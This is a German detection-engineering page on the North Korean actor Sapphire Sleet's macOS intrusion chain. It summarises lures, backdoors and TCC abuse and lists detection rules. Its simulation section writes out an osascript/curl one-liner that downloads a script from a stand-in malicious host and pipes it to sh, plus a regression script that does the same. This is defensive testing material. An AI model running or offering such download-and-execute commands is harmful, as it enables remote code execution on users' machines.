Dissektion von Sapphire Sleet’s macOS-Einbruch vom Köder zur Kompromittierung
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Microsoft Threat Intelligence hat eine auf macOS fokussierte Kampagne gemeldet, die dem nordkoreanischen staatlich geförderten Akteur Sapphire Sleet zugeschrieben wird. Der Betrieb stützt sich auf Social Engineering, um Ziele dazu zu bringen, bösartige AppleScript-Dateien auszuführen, die als legitimes Zoom SDK-Update präsentiert werden. Nach der Ausführung ruft das Skript zusätzliche Nutzlasten durch curl and osascriptab und erweitert den Einbruch in mehreren Stufen. Die Malware ist darauf ausgelegt, Anmeldedaten, Daten von Kryptowährungs-Wallets und andere sensible Informationen zu stehlen und gleichzeitig die nativen Sicherheitsvorkehrungen von macOS zu umgehen, um auf kompromittierten Systemen aktiv zu bleiben.
Untersuchung
Die Untersuchung skizziert eine mehrstufige Infektionskette, die mit einer .scpt Lockdatei beginnt und sich durch eine Reihe von curl-bis-osascript Nutzlast-Downloads fortsetzt. Forscher identifizierten mehrere Backdoor-Komponenten, darunter com.apple.cli, eine Dienst-Binärdatei, icloudzund com.google.chromes.updaters. Die Bedrohungsakteure wurden auch dabei beobachtet, wie sie in der macOS TCC-Datenbank Manipulationen vornahmen, um AppleEvents-Berechtigungen zu erhalten, reflektierende Code-Ladungstechniken einsetzten und durch einen Start-Daemon Persistenz erreichten. Die Exfiltrationsaktivität beruhte auf benutzerdefinierten User-Agent-Strings und der Kommunikation über die Telegram Bot API.
Abmilderung
Apple hat bereits Safe Browsing- und XProtect-Updates veröffentlicht, um die Infrastruktur der Kampagne und die Malware-Komponenten zu stören. Microsoft empfiehlt, die Ausführung von .scpt Dateien zu blockieren, unsichere curl Pipelines einzuschränken, nicht autorisierte Änderungen an der TCC-Datenbank zu überwachen und Installationen von Start-Daemons auf verdächtige Einträge zu prüfen. Benutzer sollten auch vor ungerechtfertigten Software-Update-Aufforderungen gewarnt werden und keine Anmeldedaten über unerwartete Dialoge oder Skripte bereitstellen.
Reaktion
Verteidiger sollten die Ausführung bösartiger AppleScript, anomale curl User-Agent-Strings und ausgehende Verbindungen zu bekannten Command-and-Control-Domains erkennen. Alle identifizierten Binärdateien und Start-Daemons sollten sofort unter Quarantäne gestellt oder entfernt werden, gefolgt von Anmeldedatensatz-Rücksetzungen für betroffene Nutzer und der Validierung der TCC-Datenbank-Integrität. Incident-Responder sollten auch forensische Analysen an gesammelten Systemartefakten durchführen und betroffene Daten aus sauberen Backups wiederherstellen, wo immer nötig.
Angriffsfluss
Erkennungen
Mögliche C2-Kommunikation über HTTP zu direkten IPs mit ungewöhnlichem Port (über Proxy)
Ansehen
Mögliche Ausführung durch Verwendung von chmod und nohup in einem einzelnen Befehl (via cmdline)
Ansehen
MacOS-Anmeldedatenvalidierung via Dscl Authonly (via cmdline)
Ansehen
Verdächtiger Curl-Ausführungsversuch [MacOS] (via cmdline)
Ansehen
Archiv wurde im temporären Ordner von MacOS erstellt (via file_event)
Ansehen
Gefährliche Berechtigungen für eine Binärdatei/Skript/Ordner wurden festgelegt (via cmdline)
Ansehen
IoCs (HashSha256) zum Erkennen: Entschlüsselung von Sapphire Sleets macOS-Eingriff vom Köder zur Kompromittierung
Ansehen
IoCs (SourceIP) zum Erkennen: Entschlüsselung von Sapphire Sleets macOS-Eingriff vom Köder zur Kompromittierung
Ansehen
IoCs (DestinationIP) zum Erkennen: Entschlüsselung von Sapphire Sleets macOS-Eingriff vom Köder zur Kompromittierung
Ansehen
Erkennung von Sapphire Sleet C2-Kommunikation [Linux-Netzwerkverbindung]
Ansehen
Erkennung der AppleScript-Ausführung mit Curl-Piping auf macOS [Linux-Prozesserstellung]
Ansehen
Ausführung der Simulation
Voraussetzung: Der Telemetrie- und Basislinien-Vorabkontrolle muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die zur Auslösung der Erkennungsregel entwickelt wurde. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu generieren, die von der Erkennung erwartet wird.
-
Angriffserzählung & Befehle:
Ein Angreifer hat ein bösartiges PowerShell-ähnliches Skript auf einem entfernten Server erhalten. Um die Erstellung einer eigenständigen Binärdatei zu vermeiden, nutzen sie die native AppleScript-Interpretationsumgebung (osascript) und leiten einencurlDownload direkt in den Interpreter und erreichen so ein „Herunterladen-und-Ausführen“ in einem Befehl. Dies entspricht dem Muster der Regelosascript+curl.# Bösartiger Einzeiler, der die Regel auslösen sollte osascript -e 'do shell script "curl -s https://malicious.example.com/payload.sh | sh"'Die Befehlszeile enthält sowohl
osascriptandcurl, sodass die Bedingung der Sigma-Regel (selection_osascript und selection_curl) zu wahr evaluiert wird. -
Regressionstestszenario:
# simulate_osascript_curl.sh # Zweck: Reproduzieren Sie die genaue Telemetrie, die die Erkennungsregel auslösen sollte. set -e # Definieren Sie eine harmlose Nutzlast zur Sicherheit (echo anstelle von tatsächlichem bösartigem Code) MALICIOUS_URL="https://example.com/benign_payload.sh" # Erstellen Sie eine Dummy-Nutzlast, die einfach eine Nachricht ausgibt. # In einem realen Red-Team-Test würden Sie ein echtes Skript hosten; hier behalten wir es sicher. curl -s -o /tmp/benign_payload.sh "$MALICIOUS_URL" || true # Führen Sie das AppleScript mit Curl, das in einen Shell-Befehl gepiped wird, aus. osascript -e "do shell script "curl -s $MALICIOUS_URL | sh"" -
Bereinigungskommandos:
# cleanup_osascript_curl.sh # Entfernen Sie alle temporären Dateien und beenden Sie umherirrende Prozesse. rm -f /tmp/benign_payload.sh pkill -f "osascript -e"